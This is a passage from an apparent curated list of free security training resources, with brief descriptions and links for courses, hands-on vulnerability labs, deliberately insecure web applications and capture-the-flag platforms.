tcpdump, Wireshark, and ChopShop in several lab exercises that reinforce the material. Some of the topics include capturing packets with tcpdump, mining DNS resolutions using only command-line tools, and busting obfuscated protocols. This class will prepare students to tackle common problems and help them begin developing the skills to handle more advanced networking challenges. - [Malware Dynamic Analysis](http://opensecuritytraining.info/MalwareDynamicAnalysis.html)<br> This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools. The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding - [Secure Code Review](http://opensecuritytraining.info/SecureCodeReview.html)<br> The course briefly talks about the development lifecycle and the importance of peer reviews in delivering a quality product. How to perform this review is discussed and how to keep secure coding a priority during the review is stressed. A variety of hands-on exercises will address common coding mistakes, what to focus on during a review, and how to manage limited time. - [Smart Cards](http://opensecuritytraining.info/SmartCards.html)<br> This course shows how smart cards are different compared to other type of cards. It is explained how smart cards can be used to realize confidentiality and integrity of information. - [The Life of Binaries](http://opensecuritytraining.info/LifeOfBinaries.html)<br> Along the way we discuss the relevance of security at different stages of a binary’s life, from the tricks that can be played by a malicious compiler, to how viruses really work, to the way which malware “packers” duplicate OS process execution functionality, to the benefit of a security-enhanced OS loader which implements address space layout randomization (ASLR). - [Understanding Cryptology: Core Concepts](http://opensecuritytraining.info/CryptoCore.html)<br> This is an introduction to cryptology with a focus on applied cryptology. It was designed to be accessible to a wide audience, and therefore does not include a rigorous mathematical foundation (this will be covered in later classes). - [Understanding Cryptology: Cryptanalysis](http://opensecuritytraining.info/Cryptanalysis.html)<br> A class for those who want to stop learning about building cryptographic systems and want to attack them. This course is a mixture of lecture designed to introduce students to a variety of code-breaking techniques and python labs to solidify those concepts. Unlike its sister class, [Core Concepts](http://opensecuritytraining.info/CryptoCore.html), math is necessary for this topic. #### Intermediate Classes - [Exploits 1: Introduction to Software Exploits](http://opensecuritytraining.info/Exploits1.html)<br> Software vulnerabilities are flaws in program logic that can be leveraged by an attacker to execute arbitrary code on a target system. This class will cover both the identification of software vulnerabilities and the techniques attackers use to exploit them. In addition, current techniques that attempt to remediate the threat of software vulnerability exploitation will be discussed. - [Exploits 2: Exploitation in the Windows Environment](http://opensecuritytraining.info/Exploits2.html)<br> This course covers the exploitation of stack corruption vulnerabilities in the Windows environment. Stack overflows are programming flaws that often times allow an attacker to execute arbitrary code in the context of a vulnerable program. There are many nuances involved with exploiting these vulnerabilities in Windows. Window's exploit mitigations such as DEP, ASLR, SafeSEH, and SEHOP, makes leveraging these programming bugs more difficult, but not impossible. The course highlights the features and weaknesses of many the exploit mitigation techniques deployed in Windows operating systems. Also covered are labs that describe the process of finding bugs in Windows applications with mutation based fuzzing, and then developing exploits that target those bugs. - [Intermediate Intel x86: Architecture, Assembly, Applications, & Alliteration](http://opensecuritytraining.info/IntermediateX86.html)<br> Building upon the Introductory Intel x86 class, this class goes into more depth on topics already learned, and introduces more advanced topics that dive deeper into how Intel-based systems work. #### Advanced Classes - [Advanced x86: Virtualization with Intel VT-x](http://opensecuritytraining.info/AdvancedX86-VTX.html)<br> The purpose of this course is to provide a hands on introduction to Intel hardware support for virtualization. The first part will motivate the challenges of virtualization in the absence of dedicated hardware. This is followed by a deep dive on the Intel virtualization "API" and labs to begin implementing a blue pill / hyperjacking attack made famous by researchers like Joanna Rutkowska and Dino Dai Zovi et al. Finally a discussion of virtualization detection techniques. - [Advanced x86: Introduction to BIOS & SMM](http://opensecuritytraining.info/IntroBIOS.html)<br> We will cover why the BIOS is critical to the security of the platform. This course will also show you what capabilities and opportunities are provided to an attacker when BIOSes are not properly secured. We will also provide you tools for performing vulnerability analysis on firmware, as well as firmware forensics. This class will take people with existing reverse engineering skills and teach them to analyze UEFI firmware. This can be used either for vulnerability hunting, or to analyze suspected implants found in a BIOS, without having to rely on anyone else. - [Introduction to Reverse Engineering Software](http://opensecuritytraining.info/IntroductionToReverseEngineering.html)<br> Throughout the history of invention curious minds have sought to understand the inner workings of their gadgets. Whether investigating a broken watch, or improving an engine, these people have broken down their goods into their elemental parts to understand how they work. This is Reverse Engineering (RE), and it is done every day from recreating outdated and incompatible software, understanding malicious code, or exploiting weaknesses in software. - [Reverse Engineering Malware](http://opensecuritytraining.info/ReverseEngineeringMalware.html)<br> This class picks up where the [Introduction to Reverse Engineering Software](http://opensecuritytraining.info/IntroductionToReverseEngineering.html) course left off, exploring how static reverse engineering techniques can be used to understand what a piece of malware does and how it can be removed. - [Rootkits: What they are, and how to find them](http://opensecuritytraining.info/Rootkits.html)<br> Rootkits are a class of malware which are dedicated to hiding the attacker’s presence on a compromised system. This class will focus on understanding how rootkits work, and what tools can be used to help find them. - [The Adventures of a Keystroke: An in-depth look into keylogging on Windows](http://opensecuritytraining.info/Keylogging.html)<br> Keyloggers are one of the most widely used components in malware. Keyboard and mouse are the devices nearly all of the PCs are controlled by, this makes them an important target of malware authors. If someone can record your keystrokes then he can control your whole PC without you noticing. ## Cybrary - Online Cyber Security Training - [CompTIA A+](https://www.cybrary.it/course/comptia-aplus)<br> This course covers the fundamentals of computer technology, basic networking, installation and configuration of PCs, laptops and related hardware, as well as configuring common features for mobile operation systems Android and Apple iOS. - [CompTIA Linux+](https://www.cybrary.it/course/comptia-linux-plus)<br> Our free, self-paced online Linux+ training prepares students with the knowledge to become a certified Linux+ expert, spanning a curriculum that covers Linux maintenance tasks, user assistance and installation and configuration. - [CompTIA Cloud+](https://www.cybrary.it/course/comptia-cloud-plus)<br> Our free, online Cloud+ training addresses the essential knowledge for implementing, managing and maintaining cloud technologies as securely as possible. It covers cloud concepts and models, virtualization, and infrastructure in the cloud. - [CompTIA Network+](https://www.cybrary.it/course/comptia-network-plus)<br> In addition to building one’s networking skill set, this course is also designed to prepare an individual for the Network+ certification exam, a distinction that can open a myriad of job opportunities from major companies - [CompTIA Advanced Security Practitioner](https://www.cybrary.it/course/comptia-casp)<br> In our free online CompTIA CASP training, you’ll learn how to integrate advanced authentication, how to manage risk in the enterprise, how to conduct vulnerability assessments and how to analyze network security concepts and components. - [CompTIA Security+](https://www.cybrary.it/course/comptia-security-plus)<br> Learn about general security concepts, basics of cryptography, communications security and operational and organizational security. With the increase of major security breaches that are occurring, security experts are needed now more than ever. - [ITIL Foundation](https://www.cybrary.it/course/itil)<br> Our online ITIL Foundation training course provides baseline knowledge for IT service management best practices: how to reduce costs, increase enhancements in processes, improve IT productivity and overall customer satisfaction. - [Cryptography](https://www.cybrary.it/course/cryptography)<br> In this online course we will be examining how cryptography is the cornerstone of security technologies, and how through its use of different encryption methods you can protect private or sensitive information from unauthorized access. - [Cisco CCNA](https://www.cybrary.it/course/cisco-ccna)<br> Our free, online, self-paced CCNA training teaches students to install, configure, troubleshoot and operate LAN, WAN and dial access services for medium-sized networks. You’ll also learn how to describe the operation of data networks. - [Virtualization Management](https://www.cybrary.it/course/virtualization-management)<br> Our free, self-paced online Virtualization Management training class focuses on installing, configuring and managing virtualization software. You’ll learn how to work your way around the cloud and how to build the infrastructure for it. - [Penetration Testing and Ethical Hacking](https://www.cybrary.it/course/ethical-hacking)<br> If the idea of hacking as a career excites you, you’ll benefit greatly from completing this training here on Cybrary. You’ll learn how to exploit networks in the manner of an attacker, in order to find out how protect the system from them. - [Computer and Hacking Forensics](https://www.cybrary.it/course/computer-hacking-forensics-analyst)<br> Love the idea of digital forensics investigation? That’s what computer forensics is all about. You’ll learn how to; determine potential online criminal activity at its inception, legally gather evidence, search and investigate wireless attacks. - [Web Application Penetration Testing](https://www.cybrary.it/course/web-application-pen-testing)<br> In this course, SME, Raymond Evans, takes you on a wild and fascinating journey into the cyber security discipline of web application pentesting. This is a very hands-on course that will require you to set up your own pentesting environment. - [CISA - Certified Information Systems Auditor](https://www.cybrary.it/course/cisa)<br> In order to face the dynamic requirements of meeting enterprise vulnerability management challenges, this course covers the auditing process to ensure that you have the ability to analyze the state of your organization and make changes where needed. - [Secure Coding](https://www.cybrary.it/course/secure-coding)<br> Join industry leader Sunny Wear as she discusses secure coding guidelines and how secure coding is important when it comes to lowering risk and vulnerabilities. Learn about XSS, Direct Object Reference, Data Exposure, Buffer Overflows, & Resource Management. - [NIST 800-171 Controlled Unclassified Information Course](https://www.cybrary.it/course/nist-800-171-controlled-unclassified-information-course)<br> The Cybrary NIST 800-171 course covers the 14 domains of safeguarding controlled unclassified information in non-federal agencies. Basic and derived requirements are presented for each security domain as defined in the NIST 800-171 special publication. - [Advanced Penetration Testing](https://www.cybrary.it/course/advanced-penetration-testing)<br> This course covers how to attack from the web using cross-site scripting, SQL injection attacks, remote and local file inclusion and how to understand the defender of the network you’re breaking into to. You’ll also learn tricks for exploiting a network. - [Intro to Malware Analysis and Reverse Engineering](https://www.cybrary.it/course/malware-analysis)<br> In this course you’ll learn how to perform dynamic and static analysis on all major files types, how to carve malicious executables from documents and how to recognize common malware tactics and debug and disassemble malicious binaries. - [Social Engineering and Manipulation](https://www.cybrary.it/course/social-engineering)<br> In this online, self-paced Social Engineering and Manipulation training class, you will learn how some of the most elegant social engineering attacks take place. Learn to perform these scenarios and what is done during each step of the attack. - [Post Exploitation Hacking](https://www.cybrary.it/course/post-exploitation-hacking)<br> In this free self-paced online training course, you’ll cover three main topics: Information Gathering, Backdooring and Covering Steps, how to use system specific tools to get general information, listener shells, metasploit and meterpreter scripting. - [Python for Security Professionals](https://www.cybrary.it/course/python)<br> This course will take you from basic concepts to advanced scripts in just over 10 hours of material, with a focus on networking and security. - [Metasploit](https://www.cybrary.it/course/metasploit)<br> This free Metasploit training class will teach you to utilize the deep capabilities of Metasploit for penetration testing and help you to prepare to run vulnerability assessments for organizations of any size. - [ISC2 CCSP - Certified Cloud Security Professional](https://www.cybrary.it/course/isc2-certified-cloud-security-professional-ccsp)<br> The reality is that attackers never rest, and along with the traditional threats targeting internal networks and systems, an entirely new variety specifically targeting the cloud has emerged. **Executive** - [CISSP - Certified Information Systems Security Professional](https://www.cybrary.it/course/cissp)<br> Our free online CISSP (8 domains) training covers topics ranging from operations security, telecommunications, network and internet security, access control systems and methodology and business continuity planning. - [CISM - Certified Information Security Manager](https://www.cybrary.it/course/cism)<br> Cybrary’s Certified Information Security Manager (CISM) course is a great fit for IT professionals looking to move up in their organization and advance their careers and/or current CISMs looking to learn about the latest trends in the IT industry. - [PMP - Project Management Professional](https://www.cybrary.it/course/project-management-professional)<br> Our free online PMP training course educates on how to initiate, plan and manage a project, as well as the process behind analyzing risk, monitoring and controlling project contracts and how to develop schedules and budgets. - [CRISC - Certified in Risk and Information Systems Control](https://www.cybrary.it/course/crisc)<br> Certified in Risk and Information Systems Control is for IT and business professionals who develop and maintain information system controls, and whose job revolves around security operations and compliance. - [Risk Management Framework](https://www.cybrary.it/course/risk-management-framework)<br> The National Institute of Standards and Technology (NIST) established the Risk Management Framework (RMF) as a set of operational and procedural standards or guidelines that a US government agency must follow to ensure the compliance of its data systems. - [ISC2 CSSLP - Certified Secure Software Life-cycle Professional](https://www.cybrary.it/course/csslp-training)<br> This course helps professionals in the industry build their credentials to advance within their organization, allowing them to learn valuable managerial skills as well as how to apply the best practices to keep organizations systems running well. - [COBIT - Control Objectives for Information and Related Technologies](https://www.cybrary.it/course/cobit)<br> Cybrary’s online COBIT certification program offers an opportunity to learn about all the components of the COBIT 5 framework, covering everything from the business end-to-end to strategies in how effectively managing and governing enterprise IT. - [Corporate Cybersecurity Management](https://www.cybrary.it/course/corporate-cybersecurity-management)<br> Cyber risk, legal considerations and insurance are often overlooked by businesses and this sets them up for major financial devastation should an incident occur. ## Hopper's Roppers Hopper's Roppers is a community dedicated to providing free training to beginners so that they have the best introduction to the field possible and have the knowledge, skills, and confidence required to figure out what the next ten thousand hours will require them to learn. - [Introduction to Computing Fundamentals](https://hoppersroppers.org/course.html)<br> A free, self-paced curriculum designed to give a beginner all of the foundational knowledge and skills required to be successful. It teaches security fundamentals along with building a strong technical foundation that students will build on for years to come. **Learning Objectives:** Linux, Hardware, Networking, Operating Systems, Power User, Scripting **Pre-Reqs:** None - [Introduction to Capture the Flags](https://hoppersroppers.github.io/courseCTF.html)<br> Free course designed to teach the fundamentals required to be successful in Capture the Flag competitions and compete in the picoCTF event. Our mentors will track your progress and provide assistance every step of the way. **Learning Objectives:** CTFs, Forensics, Cryptography, Web-Exploitation **Pre-Reqs:** Linux, Scripting - [Introduction to Security](https://hoppersroppers.github.io/courseSecurity.html)<br> Free course designed to teach students security theory and have them execute defensive measures so that they are better prepared against threats online and in the physical world. **Learning Objectives:** Security Theory, Practical Application, Real-World Examples **Pre-Reqs:** None - [Practical Skills Bootcamp](https://hoppersroppers.github.io/bootcamp.html)<br> Our free course to introduce students to Linux fundamentals and Python scripting so that they "Learn Just Enough to be Dangerous". Fastest way to get a beginner up to speed on practical knowledge. **Learning Objectives:** Linux, Scripting **Pre-Reqs:** None Laboratories ============ ## Syracuse University's SEED ### Hands-on Labs for Security Education Started in 2002, funded by a total of 1.3 million dollars from NSF, and now used by hundreds of educational institutes worldwide, the SEED project's objective is to develop hands-on laboratory exercises (called SEED labs) for computer and information security education and help instructors adopt these labs in their curricula. ### Software Security Labs These labs cover some of the most common vulnerabilities in general software. The labs show students how attacks work in exploiting these vulnerabilities. - [Buffer-Overflow Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow)<br> Launching attack to exploit the buffer-overflow vulnerability using shellcode. Conducting experiments with several countermeasures. - [Return-to-libc Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Return_to_libc)<br> Using the return-to-libc technique to defeat the "non-executable stack" countermeasure of the buffer-overflow attack. - [Environment Variable and Set-UID Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Environment_Variable_and_SetUID)<br> This is a redesign of the Set-UID lab (see below). - [Set-UID Program Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Set-UID)<br> Launching attacks on privileged Set-UID root program. Risks of environment variables. Side effects of system(). - [Race-Condition Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Race_Condition)<br> Exploiting the race condition vulnerability in privileged program. Conducting experiments with various countermeasures. - [Format-String Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Format_String)<br> Exploiting the format string vulnerability to crash a program, steal sensitive information, or modify critical data. - [Shellshock Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Shellshock)<br> Launch attack to exploit the Shellshock vulnerability that is discovered in late 2014. ### Network Security Labs These labs cover topics on network security, ranging from attacks on TCP/IP and DNS to various network security technologies (Firewall, VPN, and IPSec). - [TCP/IP Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/TCPIP)<br> Launching attacks to exploit the vulnerabilities of the TCP/IP protocol, including session hijacking, SYN flooding, TCP reset attacks, etc. - [Heartbleed Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Heartbleed)<br> Using the heartbleed attack to steal secrets from a remote server. - [Local DNS Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/DNS_Local)<br> Using several methods to conduct DNS pharming attacks on computers in a LAN environment. - [Remote DNS Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/DNS_Remote)<br> Using the Kaminsky method to launch DNS cache poisoning attacks on remote DNS servers. - [Packet Sniffing and Spoofing Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Sniffing_Spoofing)<br> Writing programs to sniff packets sent over the local network; writing programs to spoof various types of packets. - [Linux Firewall Exploration Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Firewall_Linux)<br> Writing a simple packet-filter firewall; playing with Linux's built-in firewall software and web-proxy firewall; experimenting with ways to evade firewalls. - [Firewall-VPN Lab: Bypassing Firewalls using VPN](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Firewall_VPN)<br> Implement a simple vpn program (client/server), and use it to bypass firewalls. - [Virtual Private Network (VPN) Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/VPN)<br> Design and implement a transport-layer VPN system for Linux, using the TUN/TAP technologies. This project requires at least a month of time to finish, so it is good for final project. - [Minix IPSec Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/IPSec)<br> Implement the IPSec protocol in the Minix operating system and use it to set up Virtual Private Networks. - [Minix Firewall Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Firewall_Minix)<br> Implementing a simple firewall in Minix operating system. ### Web Security Labs These labs cover some of the most common vulnerabilities in web applications. The labs show students how attacks work in exploiting these vulnerabilities. #### Elgg-Based Labs Elgg is an open-source social-network system. We have modified it for our labs. - [Cross-Site Scripting Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_XSS_Elgg)<br> Launching the cross-site scripting attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Cross-Site Request Forgery Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_CSRF_Elgg)<br> Launching the cross-site request forgery attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Web Tracking Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_Tracking_Elgg)<br> Experimenting with the web tracking technology to see how users can be checked when they browse the web. - [SQL Injection Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_SQL_Injection)<br> Launching the SQL-injection attack on a vulnerable web application. Conducting experiments with several countermeasures. #### Collabtive-Based Labs Collabtive is an open-source web-based project management system. We have modified it for our labs. - [Cross-site Scripting Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/XSS_Collabtive)<br> Launching the cross-site scripting attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Cross-site Request Forgery Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/CSRF_Collabtive)<br> Launching the cross-site request forgery attack on a vulnerable web application. Conducting experiments with several countermeasures. - [SQL Injection Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/SQL_Injection_Collabtive)<br> Launching the SQL-injection attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Web Browser Access Control Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/Web_SOP_Collabtive)<br> Exploring browser's access control system to understand its security policies. #### PhpBB-Based Labs PhpBB is an open-source web-based message board system, allowing users to post messages. We have modified it for our labs. - [Cross-site Scripting Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_XSS)<br> Launching the cross-site scripting attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Cross-site Request Forgery Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_CSRF)<br> Launching the cross-site request forgery attack on a vulnerable web application. Conducting experiments with several countermeasures. - [SQL Injection Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_SQL_Injection)<br> Launching the SQL-injection attack on a vulnerable web application. Conducting experiments with several countermeasures. - [ClickJacking Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Vulnerability/ClickJacking)<br> Launching the ClickJacking attack on a vulnerable web site. Conducting experiments with several countermeasures. ### System Security Labs These labs cover the security mechanisms in operating system, mostly focusing on access control mechanisms in Linux. - [Linux Capability Exploration Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/System/Capability_Exploration)<br> Exploring the POSIX 1.e capability system in Linux to see how privileges can be divided into smaller pieces to ensure the compliance with the Least Privilege principle. - [Role-Based Access Control (RBAC) Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/System/RBAC_Cap)<br> Designing and implementing an integrated access control system for Minix that uses both capability-based and role-based access control mechanisms. Students need to modify the Minix kernel. - [Encrypted File System Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/System/EFS)<br> Designing and implementing an encrypted file system for Minix. Students need to modify the Minix kernel. ### Cryptography Labs These labs cover three essential concepts in cryptography, including secrete-key encryption, one-way hash function, and public-key encryption and PKI. - [Secret Key Encryption Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Crypto/Crypto_Encryption)<br> Exploring the secret-key encryption and its applications using OpenSSL. - [One-Way Hash Function Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Crypto/Crypto_Hash)<br> Exploring one-way hash function and its applications using OpenSSL. - [Public-Key Cryptography and PKI Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Crypto/Crypto_PublicKey)<br> Exploring public-key cryptography, digital signature, certificate, and PKI using OpenSSL. ### Mobile Security Labs These labs focus on the smartphone security, covering the most common vulnerabilities and attacks on mobile devices. An Android VM is provided for these labs. - [Android Repackaging Lab](http://www.cis.syr.edu/~wedu/seed/Labs_Android5.1/Android_Repackaging)<br> Insert malicious code inside an existing Android app, and repackage it. - [Android Device Rooting Lab](http://www.cis.syr.edu/~wedu/seed/Labs_Android5.1/Android_Rooting)<br> Develop an OTA (Over-The-Air) package from scratch to root an Android device. ## Pentester Lab There is only one way to properly learn web penetration testing: by getting your hands dirty. We teach how to manually find and exploit vulnerabilities. You will understand the root cause of the problems and the methods that can be used to exploit them. Our exercises are based on common vulnerabilities found in different systems. The issues are not emulated. We provide you real systems with real vulnerabilities. - [From SQL Injection to Shell](https://pentesterlab.com/exercises/from_sqli_to_shell)<br> This exercise explains how you can, from a SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system. - [From SQL Injection to Shell II](https://pentesterlab.com/exercises/from_sqli_to_shell_II)<br> This exercise explains how you can, from a blind SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system. - [From SQL Injection to Shell: PostgreSQL edition](https://pentesterlab.com/exercises/from_sqli_to_shell_pg_edition)<br> This exercise explains how you can from a SQL injection gain access to the administration console. Then in the administration console, how you can run commands on the system. - [Web for Pentester](https://pentesterlab.com/exercises/web_for_pentester)<br> This exercise is a set of the most common web vulnerabilities. - [Web for Pentester II](https://pentesterlab.com/exercises/web_for_pentester_II)<br> This exercise is a set of the most common web vulnerabilities. - [PHP Include And Post Exploitation](https://pentesterlab.com/exercises/php_include_and_post_exploitation)<br> This exercice describes the exploitation of a local file include with limited access. Once code execution is gained, you will see some post exploitation tricks. - [Linux Host Review](https://pentesterlab.com/exercises/linux_host_review)<br> This exercice explains how to perform a Linux host review, what and how you can check the configuration of a Linux server to ensure it is securely configured. The reviewed system is a traditional Linux-Apache-Mysql-PHP (LAMP) server used to host a blog. - [Electronic Code Book](https://pentesterlab.com/exercises/ecb)<br> This exercise explains how you can tamper with an encrypted cookies to access another user's account. - [Rack Cookies and Commands injection](https://pentesterlab.com/exercises/rack_cookies_and_commands_injection)<br> After a short brute force introduction, this exercice explains the tampering of rack cookie and how you can even manage to modify a signed cookie (if the secret is trivial). Using this issue, you will be able to escalate your privileges and gain commands execution. - [Padding Oracle](https://pentesterlab.com/exercises/padding_oracle)<br> This course details the exploitation of a weakness in the authentication of a PHP website. The website uses Cipher Block Chaining (CBC) to encrypt information provided by users and use this information to ensure authentication. The application also leaks if the padding is valid when decrypting the information. We will see how this behavior can impact the authentication and how it can be exploited. - [XSS and MySQL FILE](https://pentesterlab.com/exercises/xss_and_mysql_file)<br> This exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator's cookies. Then how you can use his/her session to gain access to the administration to find a SQL injection and gain code execution using it. - [Axis2 Web service and Tomcat Manager](https://pentesterlab.com/exercises/axis2_and_tomcat_manager)<br> This exercice explains the interactions between Tomcat and Apache, then it will show you how to call and attack an Axis2 Web service. Using information retrieved from this attack, you will be able to gain access to the Tomcat Manager and deploy a WebShell to gain commands execution. - [Play Session Injection](https://pentesterlab.com/exercises/play_session_injection)<br> This exercise covers the exploitation of a session injection in the Play framework. This issue can be used to tamper with the content of the session while bypassing the signing mechanism. - [Play XML Entities](https://pentesterlab.com/exercises/play_xxe)<br> This exercise covers the exploitation of a XML entities in the Play framework. - [CVE-2007-1860: mod_jk double-decoding](https://pentesterlab.com/exercises/cve-2007-1860)<br> This exercise covers the exploitation of CVE-2007-1860. This vulnerability allows an attacker to gain access to unaccessible pages using crafted requests. This is a common trick that a lot of testers miss. - [CVE-2008-1930: Wordpress 2.5 Cookie Integrity Protection Vulnerability](https://pentesterlab.com/exercises/cve-2008-1930)<br> This exercise explains how you can exploit CVE-2008-1930 to gain access to the administration interface of a Wordpress installation. - [CVE-2012-1823: PHP CGI](https://pentesterlab.com/exercises/cve-2012-1823)<br> This exercise explains how you can exploit CVE-2012-1823 to retrieve the source code of an application and gain code execution. - [CVE-2012-2661: ActiveRecord SQL injection](https://pentesterlab.com/exercises/cve-2012-2661)<br> This exercise explains how you can exploit CVE-2012-2661 to retrieve information from a database. - [CVE-2012-6081: MoinMoin code execution](https://pentesterlab.com/exercises/cve-2012-6081)<br> This exercise explains how you can exploit CVE-2012-6081 to gain code execution. This vulnerability was exploited to compromise Debian's wiki and Python documentation website. - [CVE-2014-6271/Shellshock](https://pentesterlab.com/exercises/cve-2014-6271)<br> This exercise covers the exploitation of a Bash vulnerability through a CGI. ## Dr. Thorsten Schneider's Binary Auditing Learn the fundamentals of Binary Auditing. Know how HLL mapping works, get more inner file understanding than ever. Learn how to find and analyse software vulnerability. Dig inside Buffer Overflows and learn how exploits can be prevented. Start to analyse your first viruses and malware the safe way. Learn about simple tricks and how viruses look like using real life examples. - [Binary Auditing](http://www.binary-auditing.com/) ## Damn Vulnerable Web Application (DVWA) Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment. - [Damn Vulnerable Web Application (DVWA)](https://github.com/ethicalhack3r/DVWA) ## Damn Vulnerable Web Services Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities. The aim of this project is to help security professionals learn about Web Application Security through the use of a practical lab environment. - [Damn Vulnerable Web Services](https://github.com/snoopysecurity/dvws) ## NOWASP (Mutillidae) OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiest. With dozens of vulns and hints to help the user; this is an easy-to-use web hacking environment designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web sec training courses, and as an "assess the assessor" target for vulnerability assessment software. - [OWASP Mutillidae](http://sourceforge.net/projects/mutillidae/files/) ## OWASP Broken Web Applications Project Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with their no-cost and commercial VMware products. - [OWASP Broken Web Applications Project](https://sourceforge.net/projects/owaspbwa/files/1.2/) ## OWASP Bricks Bricks is a web application security learning platform built on PHP and MySQL. The project focuses on variations of commonly seen application security issues. Each 'Brick' has some sort of security issue which can be leveraged manually or using automated software tools. The mission is to 'Break the Bricks' and thus learn the various aspects of web application security. - [OWASP Bricks](http://sechow.com/bricks/download.html) ## OWASP Hackademic Challenges Project The Hackademic Challenges implement realistic scenarios with known vulnerabilities in a safe and controllable environment. Users can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security through an attacker's perspective. - [OWASP Hackademic Challenges project](https://github.com/Hackademic/hackademic/) ## Web Attack and Exploitation Distro (WAED) The Web Attack and Exploitation Distro (WAED) is a lightweight virtual machine based on Debian Distribution. WAED is pre-configured with various real-world vulnerable web applications in a sandboxed environment. It includes pentesting tools that aid in finding web application vulnerabilities. The main motivation behind this project is to provide a practical environment to learn about web application's vulnerabilities without the hassle of dealing with complex configurations. Currently, there are around 18 vulnerable applications installed in WAED. - [Web Attack and Exploitation Distro (WAED)](http://www.waed.info/) ## Xtreme Vulnerable Web Application (XVWA) XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security. It’s not advisable to host this application online as it is designed to be “Xtremely Vulnerable”. We recommend hosting this application in local/controlled environment and sharpening your application security ninja skills with any tools of your own choice. It’s totally legal to break or hack into this. The idea is to evangelize web application security to the community in possibly the easiest and fundamental way. Learn and acquire these skills for good purpose. How you use these skills and knowledge base is not our responsibility. - [Xtreme Vulnerable Web Application (XVWA)](https://github.com/s4n7h0/xvwa) ## WebGoat: A deliberately insecure Web Application WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons. - [WebGoat](https://github.com/WebGoat/WebGoat) ## Audi-1's SQLi-LABS SQLi-LABS is a comprehensive test bed to Learn and understand nitti gritty of SQL injections and thereby helps professionals understand how to protect. - [SQLi-LABS](https://github.com/Audi-1/sqli-labs) - [SQLi-LABS Videos](http://www.securitytube.net/user/Audi) Capture the Flag ================ #### Hack The Box This pentester training platform/lab is full of machines (boxes) to hack on the different difficulty level. Majority of the content generated by the community and released on the website after the staff's approval. Besides boxes users also can pick static challenges or work on advanced tasks like Fortress or Endgame. - [Hack The Box link](https://www.hackthebox.eu/) #### Vulnhub We all learn in different ways: in a group, by yourself, reading books, watching/listening to other people, making notes or things out for yourself. Learning the basics & understanding them is essential; this knowledge can be enforced by then putting it into practice. Over the years people have been creating these resources and a lot of time has been put into them, creating 'hidden gems' of training material. However, unless you know of them, its hard to discover them. So VulnHub was born to cover as many as possible, creating a catalogue of 'stuff' that is (legally) 'breakable, hackable & exploitable' - allowing you to learn in a safe environment and practice 'stuff' out. When something is added to VulnHub's database it will be indexed as best as possible, to try and give you the best match possible for what you're wishing to learn or experiment with. - [Vulnhub Repository](https://www.vulnhub.com/) #### CTF Write Ups - [CTF Resources](https://ctfs.github.io/resources)<br> A general collection of information, tools, and tips regarding CTFs and similar security competitions. - [CTF write-ups 2016](https://github.com/ctfs/write-ups-2016)<br> Wiki-like CTF write-ups repository, maintained by the community. (2015) - [CTF write-ups 